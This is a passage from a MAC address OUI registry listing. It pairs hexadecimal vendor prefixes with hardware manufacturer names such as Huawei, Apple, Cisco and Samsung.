Technology Limited 68545A Intel Corporate 3CE3E7 China Mobile Group Device Co.,Ltd. CC47BD Rhombus Systems 5488DE Cisco Systems, Inc 4C93A6 IEEE Registration Authority 001E31 infomark A83759 Huawei Device Co., Ltd. 50F7ED Huawei Device Co., Ltd. 4CB99B WEIFANG GOERTEK ELECTRONICS CO.,LTD 9C6B37 Renesas Electronics (Penang) Sdn. Bhd. BC7E8B Samsung Electronics Co.,Ltd 54778A Hewlett Packard Enterprise 40DDD1 Beautiful Card Corporation C0E7BF Sichuan AI-Link Technology Co., Ltd. 6433DB Texas Instruments A406E9 Texas Instruments B0B113 Texas Instruments 4CAEEC Guangzhou limee technology co.,LTD 0C31DC HUAWEI TECHNOLOGIES CO.,LTD 0040AB ROLAND DG CORPORATION 247152 Dell Inc. 0012B4 Work Microwave GmbH 90AAC3 Hitron Technologies. Inc 44917C HMD Global Oy 8060B7 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. DC7223 Hui Zhou Gaoshengda Technology Co.,LTD 3420E3 Ruckus Wireless 24B105 Prama Hikvision India Private Limited 709CD1 Intel Corporate 8C47BE Dell Inc. 245F9F Huawei Device Co., Ltd. CCB0A8 Huawei Device Co., Ltd. 502873 Huawei Device Co., Ltd. 20F44F Nokia 0476B0 Cisco Systems, Inc 40F078 Cisco Systems, Inc 78D71A Ciena Corporation F82E3F HUAWEI TECHNOLOGIES CO.,LTD 90A5AF HUAWEI TECHNOLOGIES CO.,LTD 9C6937 Qorvo International Pte. Ltd. 7853F2 Roxton Systems Ltd. 98FC84 IEEE Registration Authority 142C78 GooWi Wireless Technology Co., Limited 3C7C3F ASUSTek COMPUTER INC. 7C8AE1 COMPAL INFORMATION (KUNSHAN) CO., LTD. 54E4A9 BHR Tech GmbH 208058 Ciena Corporation 684AAE HUAWEI TECHNOLOGIES CO.,LTD 60D755 HUAWEI TECHNOLOGIES CO.,LTD A445CD IoT Diagnostics 946269 ARRIS Group, Inc. D0DD49 Juniper Networks C863FC ARRIS Group, Inc. 1CCCD6 Xiaomi Communications Co Ltd A8C252 Huawei Device Co., Ltd. A04147 Huawei Device Co., Ltd. 1CAECB HUAWEI TECHNOLOGIES CO.,LTD 4CF19E Groupe Atlantic 2036D7 Shanghai ReachengCommunication Technology Co.,Ltd 68070A TPVision Europe B.V 4CEBBD CHONGQING FUGUI ELECTRONICS CO.,LTD. 7CC926 Wuhan GreeNet Information Service Co.,Ltd. 5C75AF Fitbit, Inc. 38BAB0 Broadcom 70879E Beken Corporation B45062 EmBestor Technology Inc. 044A6C HUAWEI TECHNOLOGIES CO.,LTD 38FB14 HUAWEI TECHNOLOGIES CO.,LTD F0E4A2 HUAWEI TECHNOLOGIES CO.,LTD 7C5189 SG Wireless Limited 1063C8 Liteon Technology Corporation 582059 Xiaomi Communications Co Ltd 90272B Algorab S.r.l. 4CBCB4 ABB SpA - DIN Rail 94D505 Fiberhome Telecommunication Technologies Co.,LTD 74E1B6 Apple, Inc. 24A52C HUAWEI TECHNOLOGIES CO.,LTD 482759 Levven Electronics Ltd. AC7713 Honeywell Safety Products (Shanghai) Co.,Ltd 08849D Amazon Technologies Inc. 90BDE6 Quectel Wireless Solutions Co., Ltd. 18A4A9 Vanu Inc. 80E82C Hewlett Packard D4ADBD Cisco Systems, Inc 2440AE NIIC Technology Co., Ltd. F40E01 Apple, Inc. 1495CE Apple, Inc. 50DE06 Apple, Inc. 5CD135 Xtreme Power Systems 7869D4 Shenyang Vibrotech Instruments Inc. 082697 Zyxel Communications Corporation CCCCCC Silicon Laboratories CC660A Apple, Inc. FC1D43 Apple, Inc. 64CB9F TECNO MOBILE LIMITED 4CFBFE Sercomm Japan Corporation C0CBF1 Mobiwire Mobiles (NingBo) Co., LTD FC7D6C HYESUNG TECHWIN Co., Ltd E47E9A zte corporation 2C16BD IEEE Registration Authority 30A889 DECIMATOR DESIGN B4A2EB IEEE Registration Authority 1CD5E2 Shenzhen YOUHUA Technology Co., Ltd 0024E9 Samsung Electronics Co.,Ltd 683B78 Cisco Systems, Inc F860F0 Aruba, a Hewlett Packard Enterprise Company 5CA1E0 EmbedWay Technologies 84D412 Palo Alto Networks 68AB09 Nokia F4CE36 Nordic Semiconductor ASA B46077 Sichuan Changhong Electric Ltd. 00F620 Google, Inc. F43328 CIMCON Lighting Inc. 7C942A HUAWEI TECHNOLOGIES CO.,LTD 1CB796 HUAWEI TECHNOLOGIES CO.,LTD 3847BC HUAWEI TECHNOLOGIES CO.,LTD 549209 HUAWEI TECHNOLOGIES CO.,LTD 745909 HUAWEI TECHNOLOGIES CO.,LTD 5C5AC7 Cisco Systems, Inc 3CB74B Technicolor CH USA Inc. 00EDB8 KYOCERA Corporation 9C99CD Voippartners C4C603 Cisco Systems, Inc BCA13A SES-imagotag 2823F5 China Mobile (Hangzhou) Information Technology Co., Ltd. F010AB China Mobile (Hangzhou) Information Technology Co., Ltd. B4DC09 Guangzhou Dawei Communication Co.,Ltd 98865D Nokia Shanghai Bell Co., Ltd. 7CB59B TP-LINK TECHNOLOGIES CO.,LTD. 2C4F52 Cisco Systems, Inc 68A03E HUAWEI TECHNOLOGIES CO.,LTD B8C385 HUAWEI TECHNOLOGIES CO.,LTD 4CE9E4 New H3C Technologies Co., Ltd ACDB48 ARRIS Group, Inc. C80D32 Holoplot GmbH D05794 Sagemcom Broadband SAS 04D9F5 ASUSTek COMPUTER INC. B891C9 Handreamnet C8A776 HUAWEI TECHNOLOGIES CO.,LTD A400E2 HUAWEI TECHNOLOGIES CO.,LTD B4C4FC Xiaomi Communications Co Ltd C8D69D Arab International Optronics 405BD8 CHONGQING FUGUI ELECTRONICS CO.,LTD. 54EC2F Ruckus Wireless 2899C7 LINDSAY BROADBAND INC FCBD67 Arista Networks 00257E NEW POS TECHNOLOGY LIMITED F8AE27 John Deere Electronic Solutions 7445CE CRESYN C4F7D5 Cisco Systems, Inc 1C6499 Comtrend Corporation 10DC4A Fiberhome Telecommunication Technologies Co.,LTD 88EF16 ARRIS Group, Inc. 8CA96F D&M Holdings Inc. 7CD661 Xiaomi Communications Co Ltd B0FD0B IEEE Registration Authority 98B8BA LG Electronics (Mobile Communications) 0CE99A ATLS ALTEC 4C11AE Espressif Inc. 8C89FA Zhejiang Hechuan Technology Co., Ltd. 4CBC48 Cisco Systems, Inc 80D04A Technicolor CH USA Inc. 48D875 China TransInfo Technology Co., Ltd D4789B Cisco Systems, Inc 483FE9 HUAWEI TECHNOLOGIES CO.,LTD 143CC3 HUAWEI TECHNOLOGIES CO.,LTD A8E544 HUAWEI TECHNOLOGIES CO.,LTD 1820D5 ARRIS Group, Inc. 3050FD Skyworth Digital Technology(Shenzhen) Co.,Ltd 0040BC ALGORITHMICS LTD. 004065 GTE SPACENET 88E64B Juniper Networks D8D090 Dell Inc. 50C4DD BUFFALO.INC 0084ED Private E002A5 ABB Robotics F42E7F Aruba, a Hewlett Packard Enterprise Company B4CC04 Piranti B8D526 Zyxel Communications Corporation F0B968 ITEL MOBILE LIMITED 04E56E THUB Co., ltd. 1C7F2C HUAWEI TECHNOLOGIES CO.,LTD 88BCC1 HUAWEI TECHNOLOGIES CO.,LTD 1CBFCE Shenzhen Century Xinyang Technology Co., Ltd F83002 Texas Instruments A8A159 ASRock Incorporation ECADE0 D-Link International 78DA07 Zhejiang Tmall Technology Co., Ltd. 44A61E INGRAM MICRO SERVICES 38D2CA Zhejiang Tmall Technology Co., Ltd. 109E3A Zhejiang Tmall Technology Co., Ltd. 904DC3 Flonidan A/S 000DF1 IONIX INC. 00077C Westermo Network Technologies AB 8C426D HUAWEI TECHNOLOGIES CO.,LTD 90F891 Kaonmedia CO., LTD. 445D5E SHENZHEN Coolkit Technology CO.,LTD 50AD71 Tessolve Semiconductor Private Limited 202AC5 Petite-En A8BF3C HDV Phoelectron Technology Limited D4F527 SIEMENS AG B8B2F8 Apple, Inc. 98460A Apple, Inc. B85D0A Apple, Inc. 7C9A1D Apple, Inc. 103025 Apple, Inc. 70ACD7 Shenzhen YOUHUA Technology Co., Ltd 5462E2 Apple, Inc. 149D99 Apple, Inc. 147BAC Nokia 906D05 BXB ELECTRONICS CO., LTD D4BBC8 vivo Mobile Communication Co., Ltd. 489507 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 24BF74 Private CCDC55 Dragonchip Limited 28FFB2 Toshiba Corp. 1C60D2 Fiberhome Telecommunication Technologies Co.,LTD F4B5AA zte corporation E8ACAD zte corporation 0836C9 NETGEAR 745BC5 IEEE Registration Authority 9440C9 Hewlett Packard Enterprise A041A7 NL Ministry of Defense E446DA Xiaomi Communications Co Ltd 1C12B0 Amazon Technologies Inc. 4CC8A1 Cisco Meraki 4CBC98 IEEE Registration Authority 2CF432 Espressif Inc. 647366 Shenzhen Siera Technology Ltd 041EFA BISSELL Homecare, Inc. D85575 Samsung Electronics Co.,Ltd D411A3 Samsung Electronics Co.,Ltd 04BA8D Samsung Electronics Co.,Ltd 744D28 Routerboard.com 00A085 Private E05A9F IEEE Registration Authority 8C5AF8 Beijing Xiaomi Electronics Co., Ltd. D45800 Fiberhome Telecommunication Technologies Co.,LTD 90842B LEGO System A/S 00267E PARROT SA 2C557C Shenzhen YOUHUA Technology Co., Ltd F4BCDA Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 000915 CAS Corp. 58D9C3 Motorola Mobility LLC, a Lenovo Company 2C73A0 Cisco Systems, Inc 443E07 Electrolux 8485E6 Guangdong Asano Technology CO.,Ltd. 3C8375 Microsoft Corporation 000AA8 ePipe Pty. Ltd. 0029C2 Cisco Systems, Inc 187C0B Ruckus Wireless D47B35 NEO Monitors AS 000878 Benchmark Storage Innovations 6CF37F Aruba, a Hewlett Packard Enterprise Company 140708 Private 78A7EB 1MORE 485D36 Verizon 20C047 Verizon 346B46 Sagemcom Broadband SAS 7C604A Avelon 186472 Aruba, a Hewlett Packard Enterprise Company 84D47E Aruba, a Hewlett Packard Enterprise Company 24DEC6 Aruba, a Hewlett Packard Enterprise Company 0017A0 RoboTech srl 103D0A Hui Zhou Gaoshengda Technology Co.,LTD 942790 TCT mobile ltd A41791 Shenzhen Decnta Technology Co.,LTD. 34DAB7 zte corporation 109C70 Prusa Research s.r.o. E84C56 INTERCEPT SERVICES LIMITED A41908 Fiberhome Telecommunication Technologies Co.,LTD 38AFD0 Private 80D336 CERN 64255E Observint Technologies, Inc. 90940A Analog Devices, Inc 40B076 ASUSTek COMPUTER INC. D43D39 Dialog Semiconductor 0014A5 Gemtek Technology Co., Ltd. C0B5D7 CHONGQING FUGUI ELECTRONICS CO.,LTD. D4AD71 Cisco Systems, Inc 702B1D E-Domus International Limited F085C1 SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 60380E ALPS ELECTRIC CO., LTD. FC62B9 ALPS ELECTRIC CO., LTD. 0002C7 ALPS ELECTRIC CO., LTD. 001E3D ALPS ELECTRIC CO., LTD. 28A183 ALPS ELECTRIC CO., LTD. 4CDD7D LHP Telematics LLC 48F07B ALPS ELECTRIC CO., LTD. B8BC5B Samsung Electronics Co.,Ltd 108EBA Molekule 4C218C Panasonic India Private limited 2C4E7D Chunghua Intelligent Network Equipment Inc. A4F465 ITEL MOBILE LIMITED 4C917A IEEE Registration Authority F48CEB D-Link International 743A65 NEC Corporation 00255C NEC Corporation 684F64 Dell Inc. CC70ED Cisco Systems, Inc 907E30 LARS 84EB3E Vivint Smart Home 00A0D5 Sierra Wireless 18BB26 FN-LINK TECHNOLOGY LIMITED 18B905 Hong Kong Bouffalo Lab Limited ECF0FE zte corporation 94A40C Diehl Metering GmbH 70B317 Cisco Systems, Inc B00247 AMPAK Technology, Inc. BCE796 Wireless CCTV Ltd 948FCF ARRIS Group, Inc. A8F5DD ARRIS Group, Inc. 44D3AD Shenzhen TINNO Mobile Technology Corp. 9C8275 Yichip Microelectronics (Hangzhou) Co.,Ltd 5CCBCA FUJIAN STAR-NET COMMUNICATION CO.,LTD 28E98E Mitsubishi Electric Corporation 34F8E7 Cisco Systems, Inc B0907E Cisco Systems, Inc 2C7360 Earda Technologies co Ltd 508CF5 China Mobile Group Device Co.,Ltd. 1C549E Universal Electronics, Inc. E4CA12 zte corporation D49E05 zte corporation 585FF6 zte corporation 40B30E Integrated Device Technology (Malaysia) Sdn. Bhd. 04CE7E NXP France Semiconductors France C09AD0 Apple, Inc. 94B01F Apple, Inc. 98CC4D Shenzhen mantunsci co., LTD C01B23 SICHUAN TIANYI COMHEART TELECOM CO.,LTD B8C74A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D8CE3A Xiaomi Communications Co Ltd 102C6B AMPAK Technology, Inc. 7485C4 New H3C Technologies Co., Ltd 94F6D6 Apple, Inc. F82D7C Apple, Inc. D0BAE4 Shanghai MXCHIP Information Technology Co., Ltd. 48D35D Private 80FBF0 Quectel Wireless Solutions Co., Ltd. C0132B Sichuan Changhong Electric Ltd. 0CB4A4 Xintai Automobile Intelligent Network Technology 90633B Samsung Electronics Co.,Ltd FCAAB6 Samsung Electronics Co.,Ltd C82E47 Suzhou SmartChip Semiconductor Co., LTD C02250 Koss Corporation A0B549 Arcadyan Corporation 001F5A Beckwith Electric Co. 985D82 Arista Networks 2453BF Enernet 043385 Nanchang BlackShark Co.,Ltd. 84E5D8 Guangdong UNIPOE IoT Technology Co.,Ltd. A8BC9C Cloud Light Technology Limited A89042 Beijing Wanwei Intelligent Technology Co., Ltd. 18BE92 Delta Networks, Inc. 90C54A vivo Mobile Communication Co., Ltd. BC7596 Beijing Broadwit Technology Co., Ltd. 1C34DA Mellanox Technologies, Inc. 2CA02F Veroguard Systems Pty Ltd 6C5C3D IEEE Registration Authority 782327 Samsung Electronics Co.,Ltd DCF756 Samsung Electronics Co.,Ltd 68A47D Sun Cupid Technology (HK) LTD 184B0D Ruckus Wireless D41243 AMPAK Technology, Inc. 48A6B8 Sonos, Inc. B87826 Nintendo Co.,Ltd DCCBA8 Explora Technologies Inc C07878 FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. E4B97A Dell Inc. 34DAC1 SAE Technologies Development(Dongguan) Co., Ltd. 705DCC EFM Networks D092FA Fiberhome Telecommunication Technologies Co.,LTD E85AD1 Fiberhome Telecommunication Technologies Co.,LTD A823FE LG Electronics E05D5C Oy Everon Ab 688F2E Hitron Technologies. Inc E046E5 Gosuncn Technology Group Co., Ltd. 1C599B HUAWEI TECHNOLOGIES CO.,LTD D4BD1E 5VT Technologies,Taiwan LTd. BC9B68 Technicolor CH USA Inc. CCD4A1 MitraStar Technology Corp. 08BA5F Qingdao Hisense Electronics Co.,Ltd. 10DFFC Siemens AG 847F3D Integrated Device Technology (Malaysia) Sdn. Bhd. C4FDE6 DRTECH CC988B SONY Visual Products Inc. 30E3D6 Spotify USA Inc. 9CA525 Shandong USR IOT Technology Limited E0456D China Mobile Group Device Co.,Ltd. 283926 CyberTAN Technology Inc. 8CFCA0 Shenzhen Smart Device Technology Co., LTD. 1C427D GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 806933 HUAWEI TECHNOLOGIES CO.,LTD BC26C7 Cisco Systems, Inc BC5EA1 PsiKick, Inc. 944F4C Sound United LLC 981888 Cisco Meraki 18810E Apple, Inc. 608C4A Apple, Inc. 74B587 Apple, Inc. FCB6D8 Apple, Inc. 3C6A2C IEEE Registration Authority 241B7A Apple, Inc. 8CFE57 Apple, Inc. C0A600 Apple, Inc. 18E829 Ubiquiti Networks Inc. E0C286 Aisai Communication Technology Co., Ltd. 7405A5 TP-LINK TECHNOLOGIES CO.,LTD. 286DCD Beijing Winner Microelectronics Co.,Ltd. 541031 SMARTO 44A466 GROUPE LDLC D80D17 TP-LINK TECHNOLOGIES CO.,LTD. 18C2BF BUFFALO.INC E81CBA Fortinet, Inc. F0B014 AVM Audiovisuelles Marketing und Computersysteme GmbH 1889A0 Wuhan Funshion Online Technologies Co.,Ltd 0C2A86 Fiberhome Telecommunication Technologies Co.,LTD FC61E9 Fiberhome Telecommunication Technologies Co.,LTD 405662 GuoTengShengHua Electronics LTD. E4DB6D Beijing Xiaomi Electronics Co., Ltd. 00A0D1 INVENTEC CORPORATION 0018CC AXIOHM SAS 001827 NEC UNIFIED SOLUTIONS NEDERLAND B.V. 009004 3COM EUROPE LTD 00068C 3COM 02608C 3COM 00D0D8 3COM 18937F AMPAK Technology, Inc. A43523 Guangdong Donyan Network Technologies Co.,Ltd. B4A94F MERCURY CORPORATION 803AF4 Fiberhome Telecommunication Technologies Co.,LTD 48A0F8 Fiberhome Telecommunication Technologies Co.,LTD F85E3C SHENZHEN ZHIBOTONG ELECTRONICS CO.,LTD 283E76 Common Networks DC3979 Cisco Systems, Inc 58D56E D-Link International 0C5331 ETH Zurich DC9088 HUAWEI TECHNOLOGIES CO.,LTD 54812D PAX Computer Technology(Shenzhen) Ltd. 0C9A42 FN-LINK TECHNOLOGY LIMITED 000809 Systemonic AG 8C41F4 IPmotion GmbH 704F08 Shenzhen Huisheng Information Technology Co., Ltd. 8835C1 OI ELECTRIC CO.,LTD 3042A1 ilumisys Inc. DBA Toggled 0026B7 Kingston Technology Company, Inc. 28D0CB Cambridge Communication Systems Ltd 4062EA China Mobile Group Device Co.,Ltd. 4C0FC7 Earda Technologies co Ltd 80A796 Neurotek LLC CC2119 Samsung Electronics Co.,Ltd 302303 Belkin International Inc. 9CF6DD IEEE Registration Authority 001E80 Icotera A/S 48881E EthoSwitch LLC 3C71BF Espressif Inc. 000393 Apple, Inc. 0000C3 Harris Corporation 304B07 Motorola Mobility LLC, a Lenovo Company 345ABA tcloud intelligence 502FA8 Cisco Systems, Inc 902BD2 HUAWEI TECHNOLOGIES CO.,LTD 08D59D Sagemcom Broadband SAS C08359 IEEE Registration Authority EC83D5 GIRD Systems Inc 14942F USYS CO.,LTD. FCB10D Shenzhen Tian Kun Technology Co.,LTD. 20F77C vivo Mobile Communication Co., Ltd. 001EEC COMPAL INFORMATION (KUNSHAN) CO., LTD. F0761C COMPAL INFORMATION (KUNSHAN) CO., LTD. 0004AE Sullair Corporation 00451D Cisco Systems, Inc A0D635 WBS Technology 34800D Cavium Inc B44BD6 IEEE Registration Authority D8912A Zyxel Communications Corporation 3C427E IEEE Registration Authority 000BA3 Siemens AG 000C8A Bose Corporation 243A82 IRTS 880907 MKT Systemtechnik GmbH & Co. KG 58A48E PixArt Imaging Inc. 30D659 Merging Technologies SA 702AD5 Samsung Electronics Co.,Ltd 889765 exands 386E88 zte corporation B88584 Dell Inc. 40EEDD HUAWEI TECHNOLOGIES CO.,LTD B01886 SmarDTV AC751D HUAWEI TECHNOLOGIES CO.,LTD 289E97 HUAWEI TECHNOLOGIES CO.,LTD 001525 Chamberlain Access Solutions 001EB0 ImesD Electronica S.L. 641C67 DIGIBRAS INDUSTRIA DO BRASILS/A 60058A Hitachi Metals, Ltd. BC22FB RF Industries 0080B6 Mercury Systems – Trusted Mission Solutions, Inc. 08512E Orion Diagnostica Oy 98A404 Ericsson AB 00CC3F Universal Electronics, Inc. 74B91E Nanjing Bestway Automation System Co., Ltd A019B2 IEEE Registration Authority 8C15C7 HUAWEI TECHNOLOGIES CO.,LTD 60FA9D HUAWEI TECHNOLOGIES CO.,LTD DC9914 HUAWEI TECHNOLOGIES CO.,LTD 4C3FD3 Texas Instruments B05365 China Mobile IOT Company Limited 308841 Sichuan AI-Link Technology Co., Ltd. 44EFCF UGENE SOLUTION inc. 304596 HUAWEI TECHNOLOGIES CO.,LTD C0F4E6 HUAWEI TECHNOLOGIES CO.,LTD 74EB80 Samsung Electronics Co.,Ltd 0CE0DC Samsung Electronics Co.,Ltd D868C3 Samsung Electronics Co.,Ltd C493D9 Samsung Electronics Co.,Ltd A82BB9 Samsung Electronics Co.,Ltd ACFD93 WEIFANG GOERTEK ELECTRONICS CO.,LTD 68572D HANGZHOU AIXIANGJI TECHNOLOGY CO., LTD 00B8C2 Heights Telecom T ltd F4BF80 HUAWEI TECHNOLOGIES CO.,LTD 000E8F Sercomm Corporation. A0E617 MATIS 7001B5 Cisco Systems, Inc 001F49 Manhattan TV Ltd 88D652 AMERGINT Technologies FC90FA Independent Technologies D0B214 PoeWit Inc C42456 Palo Alto Networks B4B686 Hewlett Packard 4CEDFB ASUSTek COMPUTER INC. 7C2EBD Google, Inc. 6CAF15 Webasto SE E4E130 TCT mobile ltd 0C2138 Hengstler GmbH E46059 Pingtek Co., Ltd. E0191D HUAWEI TECHNOLOGIES CO.,LTD 68D1BA Shenzhen YOUHUA Technology Co., Ltd 1C1AC0 Apple, Inc. 3078C2 Innowireless / QUCELL Networks 4050B5 Shenzhen New Species Technology Co., Ltd. 3C15FB HUAWEI TECHNOLOGIES CO.,LTD CC934A Sierra Wireless 00CFC0 China Mobile Group Device Co.,Ltd. DC330D QING DAO HAIER TELECOM CO.,LTD. 688975 nuoxc 40F04E Integrated Device Technology (Malaysia) Sdn. Bhd. 0021F2 EASY3CALL Technology Limited 0015C4 FLOVEL CO., LTD. 0011E6 Scientific Atlanta 24F128 Telstra E0383F zte corporation D47226 zte corporation 40831D Apple, Inc. DCD3A2 Apple, Inc. 5C1DD9 Apple, Inc. 800588 Ruijie Networks Co.,LTD F00E1D Megafone Limited 88AE07 Apple, Inc. 68FEF7 Apple, Inc. AC35EE FN-LINK TECHNOLOGY LIMITED 881196 HUAWEI TECHNOLOGIES CO.,LTD E40EEE HUAWEI TECHNOLOGIES CO.,LTD 28D997 Yuduan Mobile Co., Ltd. 301F9A IEEE Registration Authority 0C2C54 HUAWEI TECHNOLOGIES CO.,LTD D4C19E Ruckus Wireless 70695A Cisco Systems, Inc 00BF77 Cisco Systems, Inc D07714 Motorola Mobility LLC, a Lenovo Company 30B7D4 Hitron Technologies. Inc B481BF Meta-Networks, LLC 946AB0 Arcadyan Corporation 4818FA Nocsys 587A6A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD A038F8 OURA Health Oy 687924 ELS-GmbH & Co. KG 28FD80 IEEE Registration Authority 0CAE7D Texas Instruments 304511 Texas Instruments E81AAC ORFEO SOUNDWORKS Inc. 000758 DragonWave Inc. F0FCC8 ARRIS Group, Inc. F8DF15 Sunitec Enterprise Co.,Ltd 001DB5 Juniper Networks B02680 Cisco Systems, Inc D49398 Nokia Corporation 001937 CommerceGuard AB FC7C02 Phicomm (Shanghai) Co., Ltd. A8610A ARDUINO AG 6097DD MicroSys Electronics GmbH 047970 HUAWEI TECHNOLOGIES CO.,LTD A057E3 HUAWEI TECHNOLOGIES CO.,LTD 1CB044 ASKEY COMPUTER CORP AC17C8 Cisco Meraki F4844C Texas Instruments B4F2E8 ARRIS Group, Inc. 3C574F China Mobile Group Device Co.,Ltd. D49CF4 Palo Alto Networks 8C1645 LCFC(HeFei) Electronics Technology co., ltd 689861 Beacon Inc 609813 Shanghai Visking Digital Technology Co. LTD 506B4B Mellanox Technologies, Inc. B41C30 zte corporation 705AAC Samsung Electronics Co.,Ltd 2C9569 ARRIS Group, Inc. A039EE Sagemcom Broadband SAS E4CB59 Beijing Loveair Science and Technology Co. Ltd. B4E62D Espressif Inc. 847460 zte corporation 4C82CF Dish Technologies Corp 285767 Dish Technologies Corp 70169F EtherCAT Technology Group 68EF43 Apple, Inc. D02B20 Apple, Inc. 2C61F6 Apple, Inc. D4A33D Apple, Inc. F0766F Apple, Inc. 4098AD Apple, Inc. 6C4D73 Apple, Inc. 1CA0B8 Hon Hai Precision Ind. Co., Ltd. D88466 Extreme Networks, Inc. 000496 Extreme Networks, Inc. 00E02B Extreme Networks, Inc. 5C0E8B Extreme Networks, Inc. 7467F7 Extreme Networks, Inc. E43022 Hanwha Techwin Security Vietnam 044F17 HUMAX Co., Ltd. 5C4A1F SICHUAN TIANYI COMHEART TELECOMCO., LTD E48F34 Vodafone Italia S.p.A. 685ACF Samsung Electronics Co.,Ltd 0CA8A7 Samsung Electronics Co.,Ltd B0672F Bowers & Wilkins 10CD6E FISYS D86375 Xiaomi Communications Co Ltd D89C67 Hon Hai Precision Ind. Co.,Ltd. 64209F Tilgin AB A43E51 ANOV FRANCE 702605 SONY Visual Products Inc. 0090F1 Seagate Cloud Systems Inc 845A81 ffly4u CC81DA Phicomm (Shanghai) Co., Ltd. 00806C Secure Systems & Services 007263 Netcore Technology Inc. 1C27DD Datang Gohighsec(zhejiang)Information Technology Co.,Ltd. B8C8EB ITEL MOBILE LIMITED 80C5F2 AzureWave Technology Inc. 64F88A China Mobile IOT Company Limited 68DB54 Phicomm (Shanghai) Co., Ltd. B45253 Seagate Technology 0011C6 Seagate Technology 001D38 Seagate Technology 005013 Seagate Cloud Systems Inc C8DF84 Texas Instruments 240D6C SMND 48555C Wu Qi Technologies,Inc. 18F0E4 Xiaomi Communications Co Ltd 588A5A Dell Inc. 9C8C6E Samsung Electronics Co.,Ltd DC4F22 Espressif Inc. F86CE1 Taicang T&W Electronics 1C7328 Connected Home D8E004 Vodia Networks Inc 2CFDAB Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 30B4B8 LG Electronics 380E4D Cisco Systems, Inc 3873EA IEEE Registration Authority 4C5262 Fujitsu Technology Solutions GmbH 803BF6 LOOK EASY INTERNATIONAL LIMITED 30EB1F Skylab M&C Technology Co.,Ltd 549A4C GUANGDONG HOMECARE TECHNOLOGY CO.,LTD. EC1D8B Cisco Systems, Inc EC7097 ARRIS Group, Inc. 5819F8 ARRIS Group, Inc. D07FC4 Ou Wei Technology Co.,Ltd. of Shenzhen City 1479F3 China Mobile Group Device Co.,Ltd. 0CCEF6 Guizhou Fortuneship Technology Co., Ltd 1806FF Acer Computer(Shanghai) Limited. C4CD82 Hangzhou Lowan Information Technology Co., Ltd. 30FB94 Shanghai Fangzhiwei Information Technology CO.,Ltd. 0023A0 Hana CNS Co., LTD. F406A5 Hangzhou Bianfeng Networking Technology Co., Ltd. A4B52E Integrated Device Technology (Malaysia) Sdn. Bhd. 3CA581 vivo Mobile Communication Co., Ltd. 34E911 vivo Mobile Communication Co., Ltd. 64CBA3 Pointmobile ECFABC Espressif Inc. 08BA22 Swaive Corporation 28C13C Hon Hai Precision Ind. Co., Ltd. B0ECE1 Private 60E78A UNISEM 282986 APC by Schneider Electric 707DB9 Cisco Systems, Inc 08BEAC Edimax Technology Co. Ltd. 248BE0 SICHUAN TIANYI COMHEART TELECOMCO., LTD 002424 Ace Axis Limited 50C9A0 SKIPPER AS 7483EF Arista Networks 00E0F6 DECISION EUROPE CC2DE0 Routerboard.com 00BF61 Samsung Electronics Co.,Ltd 7867D7 Apple, Inc. B8C111 Apple, Inc. 1046B4 FormericaOE 9CE33F Apple, Inc. 386B1C SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. DC5583 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 001248 Dell EMC 006048 Dell EMC 7CC95A Dell EMC D00401 Motorola Mobility LLC, a Lenovo Company 742857 Mayfield Robotics 589043 Sagemcom Broadband SAS B4A382 Hangzhou Hikvision Digital Technology Co.,Ltd. 9C9C40 SICHUAN TIANYI COMHEART TELECOMCO., LTD A407B6 Samsung Electronics Co.,Ltd 40498A Synapticon GmbH 389D92 Seiko Epson Corporation 8C0F83 Angie Hospitality LLC DC68EB Nintendo Co.,Ltd E8361D Sense Labs, Inc. 087808 Samsung Electronics Co.,Ltd 887598 Samsung Electronics Co.,Ltd C0174D Samsung Electronics Co.,Ltd 20F19E ARRIS Group, Inc. C89F42 VDII Innovation AB 7091F3 Universal Electronics, Inc. 080069 Silicon Graphics 002291 Cisco Systems, Inc 10FCB6 mirusystems CO.,LTD 04D6AA SAMSUNG ELECTRO-MECHANICS(THAILAND) 50A83A S Mobile Devices Limited 6405E9 Shenzhen WayOS Technology Crop., Ltd. A07099 Beijing Huacan Electronics Co., Ltd 48D6D5 Google, Inc. 0C5842 DME Micro B810D4 Masimo Corporation BC825D MITSUMI ELECTRIC CO.,LTD. D0666D Shenzhen Bus-Lan Technology Co., Ltd. 08152F Samsung Electronics Co., Ltd. ARTIK F4F5DB Xiaomi Communications Co Ltd F4E204 Traqueur CC2237 IEEE Registration Authority 38D620 Limidea Concept Pte. Ltd. 74F91A Onface A434F1 Texas Instruments 186024 Hewlett Packard BC3D85 HUAWEI TECHNOLOGIES CO.,LTD 2054FA HUAWEI TECHNOLOGIES CO.,LTD 38378B HUAWEI TECHNOLOGIES CO.,LTD 745C4B GN Audio A/S 00149D Sound ID Inc. A8E824 INIM ELECTRONICS S.R.L. 104963 HARTING K.K. 8CD48E ITEL MOBILE LIMITED 642B8A ALL BEST Industrial Co., Ltd. B8EE0E Sagemcom Broadband SAS ECD09F Xiaomi Communications Co Ltd 78E103 Amazon Technologies Inc. 000659 EAL (Apeldoorn) B.V. E4EC10 Nokia Corporation 002692 Mitsubishi Electric Corporation 8CC121 Panasonic Corporation AVC Networks Company EC0441 ShenZhen TIGO Semiconductor Co., Ltd. ACBE75 Ufine Technologies Co.,Ltd. 00C08F Panasonic Electric Works Co., Ltd. B0350B MOBIWIRE MOBILES (NINGBO) CO.,LTD 28A6AC seca gmbh & co. kg A8BE27 Apple, Inc. C0A53E Apple, Inc. 444E6D AVM Audiovisuelles Marketing und Computersysteme GmbH 90B1E0 Beijing Nebula Link Technology Co., Ltd 6C090A GEMATICA SRL 70E1FD FLEXTRONICS 74E60F TECNO MOBILE LIMITED 001AA7 Torian Wireless 0CB459 Marketech International Corp. 8014A8 Guangzhou V-SOLUTION Electronic Technology Co., Ltd. 409BCD D-Link International 002EC7 HUAWEI TECHNOLOGIES CO.,LTD 488EEF HUAWEI TECHNOLOGIES CO.,LTD 547595 TP-LINK TECHNOLOGIES CO.,LTD. C47154 TP-LINK TECHNOLOGIES 